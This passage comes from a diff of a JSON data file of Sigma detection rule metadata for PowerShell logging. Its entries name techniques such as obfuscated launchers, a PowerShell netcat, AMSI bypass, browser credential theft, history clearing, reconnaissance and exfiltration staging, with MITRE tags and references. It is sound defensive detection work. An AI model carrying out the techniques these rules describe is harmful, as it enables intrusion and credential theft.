Invocation - PowerShell Module" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_stdin.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "value": "Invoke-Obfuscation Via Stdin - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2019/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module" + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_powercat.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ] + }, + "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", + "value": "Netcat The Powershell Version - PowerShell Module" + }, + { + "description": "Detects remote PowerShell sessions", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/08/10", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "filename": "posh_pm_remote_powershell_session.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "value": "Remote PowerShell Session (PS Module)" + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_ad_group_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", + "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule" + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_pm_susp_download.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "value": "Suspicious PowerShell Download - PowerShell Module" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_get_nettcpconnection.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", + "value": "Use Get-NetTCPConnection - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule)", + "creation_date": "2017/03/12", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "filename": "posh_pm_susp_invocation_generic.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_invocation_specific.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_local_group_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", + "value": "Suspicious Get Local Groups Information" + }, + { + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/21", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "posh_pm_susp_reset_computermachinepassword.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "e3818659-5016-4811-a73c-dde4679169d2", + "value": "Suspicious Computer Machine Password by PowerShell" + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_pm_susp_smb_share_reco.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "6942bd25-5970-40ab-af49-944247103358", + "value": "Suspicious Get Information for SMB Share - PowerShell Module" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module" + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "creation_date": "2020/10/05", + "falsepositive": [ + "App-V clients" + ], + "filename": "posh_pm_syncappvpublishingserver_exe.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module" + }, + { + "description": "Detecting use WinAPI Functions in PowerShell", + "meta": { + "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "creation_date": "2020/10/06", + "falsepositive": [ + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + ], + "filename": "posh_ps_accessing_win_api.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1106" + ] + }, + "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", + "value": "Accessing WinAPI in PowerShell" + }, + { + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/30", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_access_to_browser_login_data.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ] + }, + "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", + "value": "Access to Browser Login Data" + }, + { + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "meta": { + "author": "Borna Talebi", + "creation_date": "2021/09/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_add_dnsclient_rule.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/NathanMcNulty/status/1569497348841287681", + "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ] + }, + "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", + "value": "Powershell Add Name Resolution Policy Table Rule" + }, + { + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_adrecon_execution.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", + "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "value": "PowerShell ADRecon Execution" + }, + { + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ] + }, + "uuid": "e0d6c087-2d1c-47fd-8799-3904103c5a98", + "value": "AMSI Bypass Pattern Assembly GetType" + }, + { + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "meta": { + "author": "Alina Stepchenkova, Group-IB, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_apt_silence_eda.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" + ] + }, + "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "value": "Silence.EDA Detection" + }, + { + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_as_rep_roasting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", + "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "value": "Get-ADUser Enumeration Using UserAccountControl Flags" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_automated_collection.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ] + }, + "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "value": "Automated Collection Command PowerShell" + }, + { + "description": "Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound", + "meta": { + "author": "Austin Songer (@austinsonger)", + "creation_date": "2021/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_azurehound_commands.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_azurehound_commands.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069" + ] + }, + "uuid": "83083ac6-1816-4e76-97d7-59af9a9ae46e", + "value": "AzureHound PowerShell Commands" + }, + { + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_capture_screenshots.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", + "value": "Windows Screen Capture with CopyFromScreen" + }, + { + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_clearing_windows_console_history.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", + "https://www.shellhacks.com/clear-history-powershell/", + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1070.003" + ] + }, + "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "value": "Clearing Windows Console History" + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "meta": { + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2022/01/25", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_clear_powershell_history.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", + "value": "Clear PowerShell History - PowerShell" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_invocation_lolscript.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "value": "Execution via CL_Invocation.ps1 - Powershell" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_invocation_lolscript_count.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", + "value": "Execution via CL_Invocation.ps1 (2 Lines)" + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml", + "level": "high", + 